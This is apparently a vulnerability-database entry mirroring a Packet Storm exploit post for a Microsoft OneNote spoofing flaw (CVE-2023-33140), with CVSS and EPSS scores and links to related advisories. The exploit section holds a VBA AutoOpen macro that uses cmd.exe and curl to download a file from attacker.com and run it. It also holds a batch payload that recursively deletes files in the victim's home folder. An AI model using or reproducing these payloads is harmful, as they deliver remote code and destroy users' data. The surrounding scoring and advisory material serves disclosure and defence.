Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormNu11secur1tyPACKETSTORM:173064
HistoryJun 22, 2023 - 12:00 a.m.

Microsoft OneNote 2305 Build 16.0.16501.20074 Spoofing

2023-06-2200:00:00
nu11secur1ty
packetstormsecurity.com
194

6.5 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

HIGH

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N

4.3 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

0.001 Low

EPSS

Percentile

35.6%

JSON
`## Title: Microsoft OneNote (Version 2305 Build 16.0.16501.20074) 64-bit - Spoofing Vulnerability  
## Author: nu11secur1ty  
## Date: 06.22.2023  
## Vendor: https://www.microsoft.com/  
## Software: https://www.microsoft.com/en/microsoft-365/onenote/digital-note-taking-app  
## Reference: https://portswigger.net/kb/issues/00400c00_input-returned-in-response-reflected  
  
## Description:  
Microsoft OneNote is vulnerable to spoofing attacks. The malicious  
user can trick the victim into clicking on a very maliciously crafted  
URL or download some other malicious file and execute it. When this  
happens the game will be over for the victim and his computer will be  
compromised.  
Exploiting the vulnerability requires that a user open a specially  
crafted file with an affected version of Microsoft OneNote and then  
click on a specially crafted URL to be compromised by the attacker.  
  
STATUS: 6.5 MEDIUM Vulnerability  
  
[+]Exploit:  
```vbs  
Sub AutoOpen()  
Call Shell("cmd.exe /S /c" & "curl -s  
https://attacker.com/kurec.badass > kurec.badass && .\kurec.badass",  
vbNormalFocus)  
End Sub  
  
```  
[+]Inside-exploit  
```  
@echo off  
del /s /q C:%HOMEPATH%\IMPORTANT\*  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-33140)  
  
## Proof and Exploit:  
[href](https://www.nu11secur1ty.com/2023/06/cve-2023-33140.html)  
  
## Time spend:  
01:15:00  
  
  
`

Related

mscve 1
prion 1
exploitdb 1
cve 1
nessus 1
zdt 1
kaspersky 1
avleonov 1
rapid7blog 1
mscve
mscve
Microsoft OneNote Spoofing Vulnerability
2023-06-13 07:00:00
prion
prion
Spoofing
2023-06-14 00:15:00
exploitdb
exploitdb
Microsoft OneNote (Version 2305 Build 16.0.16501.20074) 64-bit - Spoofing
2023-06-22 00:00:00
cve
cve
CVE-2023-33140
2023-06-14 00:15:12
nessus
nessus
Microsoft OneNote Spoofing(June 2023)
2023-06-16 00:00:00
zdt
zdt
Microsoft OneNote (Version 2305 Build 16.0.16501.20074) 64-bit - Spoofing Vulnerability
2023-06-26 00:00:00
kaspersky
kaspersky
KLA50318 Multiple vulnerabilities in Microsoft Office
2023-06-13 00:00:00
avleonov
avleonov
Microsoft Patch Tuesday June 2023: Edge type confusion, Git RCE, OneNote Spoofing, PGM RCE, Exchange RCE, SharePoint EoP
2023-06-25 00:35:58
rapid7blog
rapid7blog
Patch Tuesday - June 2023
2023-06-13 20:49:27

6.5 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

HIGH

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N

4.3 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

0.001 Low

EPSS

Percentile

35.6%

JSON
Related for PACKETSTORM:173064
mscve1prion1exploitdb1cve1nessus1zdt1kaspersky1avleonov1rapid7blog1